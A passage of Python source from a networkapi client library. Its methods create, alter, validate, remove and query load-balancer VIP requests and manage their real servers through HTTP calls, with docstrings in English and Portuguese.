healthcheck_type, healthcheck, timeout, host, maxcon, dsr, reals, reals_prioritys, reals_weights ou ports is invalid.
:raise IpNaoExisteError: IP not registered.
:raise EnvironmentVipNotFoundError: Environment Vip with values finality, client and environment not registered.
:raise VipError: Real name and Real Ip not associated.
:raise HealthCheckExpectNaoExisteError: Healthcheck_expect not registered.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['id_ipv4'] = id_ipv4
vip_map['id_ipv6'] = id_ipv6
vip_map['id_healthcheck_expect'] = id_healthcheck_expect
vip_map['finalidade'] = finality
vip_map['cliente'] = client
vip_map['ambiente'] = environment
vip_map['cache'] = cache
vip_map['maxcon'] = maxcon
vip_map['metodo_bal'] = method_bal
vip_map['persistencia'] = persistence
vip_map['healthcheck_type'] = healthcheck_type
vip_map['healthcheck'] = healthcheck
vip_map['timeout'] = timeout
vip_map['host'] = host
vip_map['areanegocio'] = areanegocio
vip_map['nome_servico'] = nome_servico
vip_map['l7_filter'] = l7_filter
vip_map['reals'] = {'real': reals}
vip_map['reals_prioritys'] = {'reals_priority': reals_prioritys}
vip_map['reals_weights'] = {'reals_weight': reals_weights}
vip_map['portas_servicos'] = {'porta': ports}
vip_map['rule_id'] = rule_id
code, xml = self.submit({'vip': vip_map}, 'POST', 'requestvip/')
return self.response(code, xml)
def alter(
self,
id_vip,
id_ipv4,
id_ipv6,
id_healthcheck_expect,
validated,
vip_created,
finality,
client,
environment,
cache,
method_bal,
persistence,
healthcheck_type,
healthcheck,
timeout,
host,
maxcon,
areanegocio,
nome_servico,
l7_filter,
reals,
reals_prioritys,
reals_weights,
ports,
rule_id=''):
"""Change VIP from by the identifier.
:param id_vip: Identifier of the VIP. Integer value and greater than zero.
:param id_ipv4: Identifier of the IPv4. Integer value and greater than zero.
:param id_ipv6: Identifier of the IPv6. Integer value and greater than zero.
:param id_healthcheck_expect: Identifier of the expected result. (Only if healthcheck_type is HTTP)
:param validated: Indication of VIP Validated. 0 or 1
:param vip_created: Indication Vip created. 0 or 1
:param finality: finality.
:param client: client.
:param environment: environment.
:param cache: cache.
:param method_bal: method_bal.
:param persistence: persistence.
:param healthcheck_type: healthcheck_type.
:param healthcheck: The URL to be checked. (Only if healthcheck_type is HTTP)
:param timeout: Timeout. Integer value and greater than zero.
:param host: Host.
:param maxcon: Maximum number of connections. Integer value and greater than zero.
:param areanegocio: area of business.
:param nome_servico: host.
:param l7_filter: l7_filter.
:param reals: List of reals. Ex: [{'real_name':'Teste1', 'real_ip':'10.10.10.1'},{'real_name':'Teste2', 'real_ip':'10.10.10.2'}]
:param reals_prioritys: List of reals_priority. Ex: ['1','5','3'].
:param reals_weights: List of reals_weight. Ex: ['1','5','3'].
:param ports: List of ports. Ex: ['80:80','8080:80','25:445'].
:param rule_id: rule id.
:return: None
:raise InvalidParameterError: IP identifier is null and invalid.
:raise InvalidParameterError: The value of finality, client, environment, cache, method_bal, persistence,
healthcheck_type, healthcheck, timeout, host, maxcon, dsr, reals, reals_prioritys, reals_weights ou ports is invalid.
:raise IpNaoExisteError: IP not registered.
:raise VipError: VipError
:raise VipNaoExisteError: Request VIP not registered.
:raise HealthCheckExpectNaoExisteError: Healthcheck_expect not registered.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
vip_map = dict()
vip_map['id_ipv4'] = id_ipv4
vip_map['id_ipv6'] = id_ipv6
vip_map['id_healthcheck_expect'] = id_healthcheck_expect
vip_map['validado'] = validated
vip_map['vip_criado'] = vip_created
vip_map['finalidade'] = finality
vip_map['cliente'] = client
vip_map['ambiente'] = environment
vip_map['cache'] = cache
vip_map['maxcon'] = maxcon
vip_map['metodo_bal'] = method_bal
vip_map['persistencia'] = persistence
vip_map['healthcheck_type'] = healthcheck_type
vip_map['healthcheck'] = healthcheck
vip_map['timeout'] = timeout
vip_map['host'] = host
vip_map['areanegocio'] = areanegocio
vip_map['nome_servico'] = nome_servico
vip_map['l7_filter'] = l7_filter
vip_map['reals'] = {'real': reals}
vip_map['reals_prioritys'] = {'reals_priority': reals_prioritys}
vip_map['reals_weights'] = {'reals_weight': reals_weights}
vip_map['portas_servicos'] = {'porta': ports}
vip_map['rule_id'] = rule_id
url = 'requestvip/' + str(id_vip) + '/'
code, xml = self.submit({'vip': vip_map}, 'PUT', url)
return self.response(code, xml)
def edit_reals(
self,
id_vip,
method_bal,
reals,
reals_prioritys,
reals_weights,
alter_priority=0):
"""Execute the script 'gerador_vips' several times with options -real, -add and -del to adjust vip request reals.
:param id_vip: Identifier of the VIP. Integer value and greater than zero.
:param method_bal: method_bal.
:param reals: List of reals. Ex: [{'real_name':'Teste1', 'real_ip':'10.10.10.1'},{'real_name':'Teste2', 'real_ip':'10.10.10.2'}]
:param reals_prioritys: List of reals_priority. Ex: ['1','5','3'].
:param reals_weights: List of reals_weight. Ex: ['1','5','3'].
:param alter_priority: 1 if priority has changed and 0 if hasn't changed.
:return: None
:raise VipNaoExisteError: Request VIP not registered.
:raise InvalidParameterError: Identifier of the request is invalid or null VIP.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
:raise EnvironmentVipError: The combination of finality, client and environment is invalid.
:raise InvalidTimeoutValueError: The value of timeout is invalid.
:raise InvalidBalMethodValueError: The value of method_bal is invalid.
:raise InvalidCacheValueError: The value of cache is invalid.
:raise InvalidPersistenceValueError: The value of persistence is invalid.
:raise InvalidPriorityValueError: One of the priority values is invalid.
:raise EquipamentoNaoExisteError: The equipment associated with this Vip Request doesn't exist.
:raise IpEquipmentError: Association between equipment and ip of this Vip Request doesn't exist.
:raise IpError: IP not registered.
:raise RealServerPriorityError: Vip Request priority list has an error.
:raise RealServerWeightError: Vip Request weight list has an error.
:raise RealServerPortError: Vip Request port list has an error.
:raise RealParameterValueError: Vip Request real server parameter list has an error.
:raise RealServerScriptError: Vip Request real server script execution error.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
vip_map = dict()
vip_map['vip_id'] = id_vip
# vip_map['metodo_bal'] = method_bal
vip_map['reals'] = {'real': reals}
vip_map['reals_prioritys'] = {'reals_priority': reals_prioritys}
vip_map['reals_weights'] = {'reals_weight': reals_weights}
vip_map['alter_priority'] = alter_priority
url = 'vip/real/edit/'
code, xml = self.submit({'vip': vip_map}, 'PUT', url)
return self.response(code, xml)
def adicionar_real(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option - add.
:param vip_id: Identifier of the Request VIP. Integer value and greater than zero.
:param ip_id: Identifier of the IP. Integer value and greater than zero.
:param equip_id: Identifier of the Equipament. Integer value and greater than zero.
:param port_vip: Port Vip. Integer value between 1 to 65535.
:param port_real: Port Real. Integer value between 1 to 65535.
:return: Following dictionary:
::
{‘sucesso’: {‘codigo’: < codigo >,
‘descricao’: {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP , Equipament, or IP is null and invalid.
:raise EquipamentoNaoExisteError: Equipament not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['operation'] = 'add'
vip_map['network_version'] = IP_VERSION.IPv4[0]
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def add_real_ipv6(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option - add.
:param vip_id: Identifier of the Request VIP. Integer value and greater than zero.
:param ip_id: Identifier of the IP. Integer value and greater than zero.
:param equip_id: Identifier of the Equipament. Integer value and greater than zero.
:param port_vip: Port Vip. Integer value between 1 to 65535.
:param port_real: Port Real. Integer value between 1 to 65535.
:return: Following dictionary:
::
{‘sucesso’: {‘codigo’: < codigo >,
‘descricao’: {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP , Equipament, or IP is null and invalid.
:raise EquipamentoNaoExisteError: Equipament not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['operation'] = 'add'
vip_map['network_version'] = IP_VERSION.IPv6[0]
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def habilitar_real(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option - ena.
:param vip_id: Identifier of the Request VIP. Integer value and greater than zero.
:param ip_id: Identifier of the IP. Integer value and greater than zero.
:param equip_id: Identifier of the Equipament. Integer value and greater than zero.
:param port_vip: Port Vip. Integer value between 1 to 65535.
:param port_real: Port Real. Integer value between 1 to 65535.
:return: Following dictionary:
::
{‘sucesso’: {‘codigo’: < codigo >,
‘descricao’: {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP , Equipament, or IP is null and invalid.
:raise EquipamentoNaoExisteError: Equipament not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
vip_map['operation'] = 'ena'
vip_map['network_version'] = IP_VERSION.IPv4[0]
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def enable_real_ipv6(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option - ena.
:param vip_id: Identifier of the Request VIP. Integer value and greater than zero.
:param ip_id: Identifier of the IP. Integer value and greater than zero.
:param equip_id: Identifier of the Equipament. Integer value and greater than zero.
:param port_vip: Port Vip. Integer value between 1 to 65535.
:param port_real: Port Real. Integer value between 1 to 65535.
:return: Following dictionary:
::
{‘sucesso’: {‘codigo’: < codigo >,
‘descricao’: {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP , Equipament, or IP is null and invalid.
:raise EquipamentoNaoExisteError: Equipament not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
vip_map['operation'] = 'ena'
vip_map['network_version'] = IP_VERSION.IPv6[0]
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def desabilitar_real(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option - dis.
:param vip_id: Identifier of the Request VIP. Integer value and greater than zero.
:param ip_id: Identifier of the IP. Integer value and greater than zero.
:param equip_id: Identifier of the Equipament. Integer value and greater than zero.
:param port_vip: Port Vip. Integer value between 1 to 65535.
:param port_real: Port Real. Integer value between 1 to 65535.
:return: Following dictionary:
::
{‘sucesso’: {‘codigo’: < codigo >,
‘descricao’: {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP , Equipament, or IP is null and invalid.
:raise EquipamentoNaoExisteError: Equipament not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
vip_map['operation'] = 'dis'
vip_map['network_version'] = IP_VERSION.IPv4[0]
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def disable_real_ipv6(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option - dis.
:param vip_id: Identifier of the Request VIP. Integer value and greater than zero.
:param ip_id: Identifier of the IP. Integer value and greater than zero.
:param equip_id: Identifier of the Equipament. Integer value and greater than zero.
:param port_vip: Port Vip. Integer value between 1 to 65535.
:param port_real: Port Real. Integer value between 1 to 65535.
:return: Following dictionary:
::
{‘sucesso’: {‘codigo’: < codigo >,
‘descricao’: {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP , Equipament, or IP is null and invalid.
:raise EquipamentoNaoExisteError: Equipament not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
vip_map['operation'] = 'dis'
vip_map['network_version'] = IP_VERSION.IPv6[0]
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def checar_real(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option - chk.
:param vip_id: Identifier of the Request VIP. Integer value and greater than zero.
:param ip_id: Identifier of the IP. Integer value and greater than zero.
:param equip_id: Identifier of the Equipament. Integer value and greater than zero.
:param port_vip: Port Vip. Integer value between 1 to 65535.
:param port_real: Port Real. Integer value between 1 to 65535.
:return: Following dictionary:
::
{‘sucesso’: {‘codigo’: < codigo >,
‘descricao’: {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP , Equipament, or IP is none or invalid.
:raise EquipamentoNaoExisteError: Equipament not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
vip_map['operation'] = 'chk'
vip_map['network_version'] = IP_VERSION.IPv4[0]
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def check_real_ipv6(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option - chk.
:param vip_id: Identifier of the Request VIP. Integer value and greater than zero.
:param ip_id: Identifier of the IP. Integer value and greater than zero.
:param equip_id: Identifier of the Equipament. Integer value and greater than zero.
:param port_vip: Port Vip. Integer value between 1 to 65535.
:param port_real: Port Real. Integer value between 1 to 65535.
:return: Following dictionary:
::
{‘sucesso’: {‘codigo’: < codigo >,
‘descricao’: {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP , Equipament, or IP is null and invalid.
:raise EquipamentoNaoExisteError: Equipament not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
vip_map['operation'] = 'chk'
vip_map['network_version'] = IP_VERSION.IPv6[0]
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def remover(self, id_vip, keep_ip=False):
"""Removes a vip request by its identifier.
:param id_vip: Vip request identifier.
:return: None
:raise RequisicaoVipNaoExisteError: Vip request does not exist.
:raise InvalidParameterError: Vip request is none or invalid.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'Vip request identifier is invalid or was not informed.')
url = 'vip/delete/' + str(id_vip) + '/'
if keep_ip:
# since there is no standard way to pass parameters to DELETE
# I prefer to use querystring because all library support use it
url = "%s?keep_ip=1" % url
code, xml = self.submit(None, 'DELETE', url)
return self.response(code, xml)
def validate(self, id_vip):
"""Validates vip request by its identifier.
:param id_vip: Vip request identifier.
:return: None
:raise RequisicaoVipNaoExisteError: Vip request does not exist.
:raise InvalidParameterError: Vip request identifier is none or invalid.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'Vip request identifier is invalid or was not informed.')
url = 'vip/validate/' + str(id_vip) + '/'
code, xml = self.submit(None, 'GET', url)
return self.response(code, xml)
def remover_real(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option - del.
:param vip_id: Identifier of the Request VIP. Integer value and greater than zero.
:param ip_id: Identifier of the IP. Integer value and greater than zero.
:param equip_id: Identifier of the Equipament. Integer value and greater than zero.
:param port_vip: Port Vip. Integer value between 1 to 65535.
:param port_real: Port Real. Integer value between 1 to 65535.
:return: Following dictionary:
::
{‘sucesso’: {‘codigo’: < codigo >,
‘descricao’: {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP , Equipament, or IP is null and invalid.
:raise EquipamentoNaoExisteError: Equipament not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['operation'] = 'del'
vip_map['network_version'] = IP_VERSION.IPv4[0]
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def remove_real_ipv6(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option - del.
:param vip_id: Identifier of the Request VIP. Integer value and greater than zero.
:param ip_id: Identifier of the IP. Integer value and greater than zero.
:param equip_id: Identifier of the Equipament. Integer value and greater than zero.
:param port_vip: Port Vip. Integer value between 1 to 65535.
:param port_real: Port Real. Integer value between 1 to 65535.
:return: Following dictionary:
::
{‘sucesso’: {‘codigo’: < codigo >,
‘descricao’: {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise InvalidParameterError: The identifier of Request VIP , Equipament, or IP is null and invalid.
:raise EquipamentoNaoExisteError: Equipament not registered.
:raise IpNaoExisteError: IP is not registered.
:raise VipNaoExisteError: Request VIP not registered.
:raise IpError: Relationship between IP and equipment not registered.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['vip_id'] = vip_id
vip_map['ip_id'] = ip_id
vip_map['equip_id'] = equip_id
vip_map['operation'] = 'del'
vip_map['network_version'] = IP_VERSION.IPv6[0]
vip_map['port_vip'] = port_vip
vip_map['port_real'] = port_real
url = 'vip/real/'
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def alterar(
self,
id_vip,
id_ip,
id_healthcheck_expect,
validado,
vip_criado,
finalidade,
cliente,
ambiente,
cache,
metodo_bal,
persistencia,
healthcheck_type,
healthcheck,
timeout,
host,
maxcon,
dsr,
bal_ativo,
transbordos,
reals,
portas_servicos):
"""Altera uma requisição de VIP a partir do seu identificador.
:param id_vip: Identificador da requisição de VIP.
:param id_ip: Identificador do IP.
:param id_healthcheck_expect: Identificador healthcheck expect.
:param validado: Indicação de VIP Validado ('0' ou '1').
:param vip_criado: Indicação de Vip criado ('0' ou '1').
:param finalidade: Finalidade.
:param cliente: Cliente.
:param ambiente: Ambiente.
:param cache: Cache.
:param metodo_bal: Método de balanceamento.
:param persistencia: Persistência.
:param healthcheck_type: Tipo de healthcheck.
:param healthcheck: Healthcheck.
:param timeout: Timeout.
:param host: Host.
:param maxcon: Número máximo de conexões.
:param dsr: DSR.
:param bal_ativo: Balanceador ativo.
:param transbordos: Lista com os IPs dos servidores de transbordo. Ex: ['10.10.100.1','192.168.1.1'].
:param reals: Lista de reals. Ex: [{'real_name':'Teste1', 'real_ip':'10.10.10.1'},{'real_name':'Teste2', 'real_ip':'10.10.10.2'}]
:param portas_servicos: Lista das portas. Ex: ['80','8080','445'].
:return: None
:raise VipError: Não é permitido alterar o IP de uma requisição de VIP já criada.
:raise InvalidParameterError: Identificador do IP e/ou da requisição de VIP é nulo ou inválido.
:raise InvalidParameterError: O valor de finalidade, cliente, ambiente, cache, metodo_bal, persistencia,
healthcheck_type, healthcheck, timeout, host, maxcon, dsr, bal_ativo, transbordos, reals ou portas é inválido.
:raise IpNaoExisteError: IP não cadastrado.
:raise HealthCheckExpectNaoExisteError: Healthcheck_expect não cadastrado.
:raise VipNaoExisteError: Requisição de VIP não cadastrada.
:raise DataBaseError: Falha na networkapi ao acessar o banco de dados.
:raise XMLError: Falha na networkapi ao ler o XML de requisição ou gerar o XML de resposta.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'O identificador do vip é inválido ou não foi informado.')
vip_map = dict()
vip_map['id_ip'] = id_ip
vip_map['id_healthcheck_expect'] = id_healthcheck_expect
vip_map['validado'] = validado
vip_map['vip_criado'] = vip_criado
vip_map['finalidade'] = finalidade
vip_map['cliente'] = cliente
vip_map['ambiente'] = ambiente
vip_map['cache'] = cache
vip_map['maxcon'] = maxcon
vip_map['metodo_bal'] = metodo_bal
vip_map['persistencia'] = persistencia
vip_map['healthcheck_type'] = healthcheck_type
vip_map['healthcheck'] = healthcheck
vip_map['timeout'] = timeout
vip_map['host'] = host
vip_map['dsr'] = dsr
vip_map['bal_ativo'] = bal_ativo
vip_map['transbordos'] = {'transbordo': transbordos}
vip_map['reals'] = {'real': reals}
vip_map['portas_servicos'] = {'porta': portas_servicos}
url = 'vip/' + str(id_vip) + '/'
code, xml = self.submit({'vip': vip_map}, 'PUT', url)
return self.response(code, xml)
def buscar(self, id_vip):
"""Obtém uma requisição de VIP a partir do seu identificador.
:param id_vip: Identificador da requisição de VIP.
:return: Dicionário com a seguinte estrutura:
::
{‘vip’: {‘id’: < id >,
‘validado’: < validado >,
‘finalidade’: < finalidade >,
‘cliente’: < cliente >,
‘ambiente’: < ambiente >,
‘cache’: < cache >,
‘metodo_bal’: < método_bal >,
‘persistencia’: < persistencia >,
‘healthcheck_type’: < healthcheck_type >,
‘healthcheck’: < healthcheck >,
‘timeout’: < timeout >,
‘host’: < host >,
‘maxcon’: < maxcon >,
‘dsr’: < dsr >,
‘bal_ativo’: < bal_ativo >,
‘transbordos’:{‘transbordo’:[< transbordo >, ... demais transbordos...]},
‘reals’:{‘real’:[{‘real_name’:< real_name >, ‘real_ip’:< real_ip >}, …demais reals …]},
‘portas_servicos’:{‘porta’:[< porta >, … demais portas …]},
‘vip_criado’: < vip_criado >,
‘id_ip’: < id_ip >,
‘id_ipv6’: < id_ipv6 >,
‘id_healthcheck_expect’: < id_healthcheck_expect >}}
:raise VipNaoExisteError: Requisição de VIP não cadastrada.
:raise InvalidParameterError: O identificador da requisição de VIP é nulo ou inválido.
:raise DataBaseError: Falha na networkapi ao acessar o banco de dados.
:raise XMLError: Falha na networkapi ao gerar o XML de resposta.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'O identificador do vip é inválido ou não foi informado.')
url = 'vip/' + str(id_vip) + '/'
code, xml = self.submit(None, 'GET', url)
return self.response(code, xml)
def find_vip_requests(self, id_vip, ip, pagination, create=None):
"""Get VIPs by id or ipv4 or ipv6.
:return: Dictionary with the following structure:
::
{‘vip’: {‘id’: < id >,
‘validado’: < validado >,
‘ambiente’: < ambiente >,
'ip':<ip>,
'descricao':<descricao>,
'equipamento':<equipamentos>,
'criado':<criado>,
'is_more':<is_more>, ... too vips ... } }
:raise VipNaoExisteError: No request for registered VIP.
:raise DataBaseError: Can't connect to networkapi database.
:raise XMLError: Failed to generate the XML response.
"""
url = 'requestvip/get_by_ip_id/'
vip_map = dict()
vip_map["start_record"] = pagination.start_record
vip_map["end_record"] = pagination.end_record
vip_map["asorting_cols"] = pagination.asorting_cols
vip_map["searchable_columns"] = pagination.searchable_columns
vip_map["custom_search"] = pagination.custom_search
vip_map['id_vip'] = id_vip
vip_map['ip'] = ip
vip_map['create'] = create
code, xml = self.submit({'vip': vip_map}, 'POST', url)
key = "vip"
return get_list_map(
self.response(
code, xml, [
"equipments", "environments", "ips"]), key)
def get_by_id(self, id_vip):
"""Get VIPs by id.
:return: Dictionary with the following structure:
::
{‘vip’: {‘id’: < id >,
‘validado’: < validado >,
'ips':<list of vip's ip (v4 and/or v6>),
'descricao':<descricao>,
'equipamento':<equipamentos>,
'criado':<criado>,
'environent':<ambientes>,
'ipv4_description':<descricao ipv4>,
'ipv6_description':<descricao ipv6>,
'variaveis':<variaveis>,
‘id_healthcheck_expect’: < id_healthcheck_expect >,
‘cache’: < cache >, } }
:raise VipNaoExisteError: No request for registered VIP.
:raise DataBaseError: Can't connect to networkapi database.
:raise XMLError: Failed to generate the XML response.
"""
url = 'requestvip/getbyid/' + str(id_vip) + '/'
code, xml = self.submit(None, 'GET', url)
key = "vip"
return get_list_map(
self.response(
code, xml, [
"equipamento", "ips"]), key)
def get_all(self):
"""Get all VIPs.
:return: Dictionary with the following structure:
::
{‘vip_< id >’: {‘id’: < id >,
‘validado’: < validado >,
‘finalidade’: < finalidade >,
‘cliente’: < cliente >,
‘ambiente’: < ambiente >,
‘cache’: < cache >,
‘metodo_bal’: < método_bal >,
‘persistencia’: < persistencia >,
‘healthcheck_type’: < healthcheck_type >,
‘healthcheck’: < healthcheck >,
‘timeout’: < timeout >,
‘host’: < host >,
‘maxcon’: < maxcon >,
‘dsr’: < dsr >,
‘bal_ativo’: < bal_ativo >,
‘transbordos’:{‘transbordo’:[< transbordo >, ... too transbordos ...]},
‘reals’:{‘real’:[{‘real_name’:< real_name >, ‘real_ip’:< real_ip >}, ... too reals ...]},
‘portas_servicos’:{‘porta’:[< porta >, ... too portas ...]},
‘vip_criado’: < vip_criado >,
‘id_ip’: < id_ip >,
‘id_ipv6’: < id_ipv6 >,
‘id_healthcheck_expect’: < id_healthcheck_expect >} ... too vips ... }
:raise VipNaoExisteError: No request for registered VIP.
:raise DataBaseError: Can't connect to networkapi database.
:raise XMLError: Failed to generate the XML response.
"""
url = 'vip/all/'
code, xml = self.submit(None, 'GET', url)
return self.response(code, xml)
def get_by_ipv4(self, ipv4, all_prop=0):
"""Get VIPs related to ipv4
:param ipv4: The IPv4 to find all VIPs ralated
:param all_prop: (Optional) Gets all properties, not only ids. (0 or 1)
:return: Dictionary with the following structure:
::
{'ips': [ {'vips': '[< id >, < id >]', 'oct4': < oct4 >, 'oct2': < oct2 >,
'oct3': < oct3 >, 'oct1': < oct1 >, 'networkipv4': < networkipv4 >,
'id': <id >, 'descricao': < descricao >}, ... ] }
:raise VipNaoExisteError: No request for registered VIP.
:raise DataBaseError: Can't connect to networkapi database.
:raise XMLError: Failed to generate the XML response.
"""
url = 'vip/ipv4/all/'
vip_map = dict()
vip_map['ipv4'] = ipv4
vip_map['all_prop'] = all_prop
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml, ['vips'])
def get_by_ipv6(self, ipv6, all_prop=0):
"""Get VIPs related to ipv6
:param ipv6: The IPv6 to find all VIPs related
:param all_prop: (Optional) Gets all properties, not only ids. (0 or 1)
:return: Dictionary with the following structure:
::
{'ips': [ {'vips': '[< id >, < id >]', 'block4': < block4 >, 'block2': < block2 >,
'block3': < block3 >, 'block1': < block1 >, 'block5': < block5 >,
'block6': < block6 >, 'block7': < block7 >, 'block8': < block8 >,
'networkipv6': < networkipv6 >, 'id': <id >, 'descricao': < descricao >}, ... ] }
:raise VipNaoExisteError: No request for registered VIP.
:raise DataBaseError: Can't connect to networkapi database.
